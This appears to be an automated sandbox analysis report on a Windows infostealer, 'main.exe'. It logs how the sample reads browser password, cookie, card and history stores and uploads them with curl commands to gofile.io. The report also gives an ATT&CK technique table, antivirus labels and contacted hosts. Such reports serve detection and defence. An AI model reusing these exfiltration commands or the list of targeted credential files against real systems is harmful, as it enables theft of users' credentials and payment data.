            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF7333BA7E0 cpuid 0_2_00007FF7333BA7E0
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\certifi VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dll VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3.dll VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\libffi-8.dll VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dll VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF73339C5E0 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, 0_2_00007FF73339C5E0
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF7333B6E70 _get_daylight, _get_daylight, _get_daylight, _get_daylight, _get_daylight, GetTimeZoneInformation, 0_2_00007FF7333B6E70

            Stealing of Sensitive Information

            Source: Yara match File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\local Storage\leveldb
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb\000003.log
            Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

            Remote Access Functionality

            Source: Yara match File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 33 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            [Behavior graph, ID: 1579350. Sample: main.exe, Startdate: 21/12/2024, Architecture: WINDOWS, Score: 92. main.exe drops PE32+ .pyd files (88 other files, none is malicious) and starts a second main.exe and conhost.exe. The second main.exe contacts ip-api.com (208.95.112.1) and api.gofile.io (45.112.123.126) and starts cmd.exe processes that launch WMIC.exe and curl.exe.]

            Source | Detection | Scanner | Label | Link
            main.exe | 16% | ReversingLabs | Win64.Trojan.ReverseShell |
            main.exe | 24% | Virustotal | | Browse
            main.exe | 100% | Avira | OSX/GM.ReverseShe.TH |
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ip-api.com | 208.95.112.1 | true | false | | high
            api.gofile.io | 45.112.123.126 | true | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            https://api.gofile.io/servers | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf | main.exe, 00000002.00000003.1998028650.000001E894BC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://www.dabeaz.com/ply)F | main.exe, 00000002.00000003.1998028650.000001E894BDE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://api.telegram.org/bot | main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | false | | high
            http://aka.ms/vcpython27 | main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmp | false | | high
            https://github.com/mhammond/pywin32 | main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://coinbase.com) | main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | false | | high
            https://stake.com) | main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | false | | high
            https://tiktok.com) | main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | false | | high
            http://docs.python.org/library/unittest.html | main.exe, 00000002.00000003.1972543562.000001E893395000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://discord.com) | main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp | false | | high
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://repository.swisssign.com/3main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.opensource.org/licenses/mit-license.phptrolsmain.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpfalse
                                            unknown
                                            https://tools.ietf.org/html/rfc2388#section-4.4main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.securetrust.com/SGCA.crl0tmain.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64main.exe, 00000002.00000003.2008146184.000001E8936B4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981959975.000001E89369F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793761731.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981084453.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982725593.000001E8936B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976651882.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981251684.000001E893699000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982367230.000001E8936A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E893698000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E893698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://paypal.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/pypa/packagingmain.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.opensource.org/licenses/mit-license.phpmain.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://stackoverflow.com/questions/19622133/main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://riotgames.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://refspecs.linuxfoundation.org/elf/gabi4main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://xbox.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://youtube.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://docs.python.org/3/library/subprocess#subprocess.Popen.killmain.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://tools.ietf.org/html/rfc3610main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://peps.python.org/pep-0205/main.exe, 00000002.00000002.2017333313.000001E8933F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780566116.000001E89356F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779749185.000001E89356F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.dhimyotis.com/certignarootca.crlmain.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://curl.haxx.se/rfc/cookie_spec.htmlmain.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
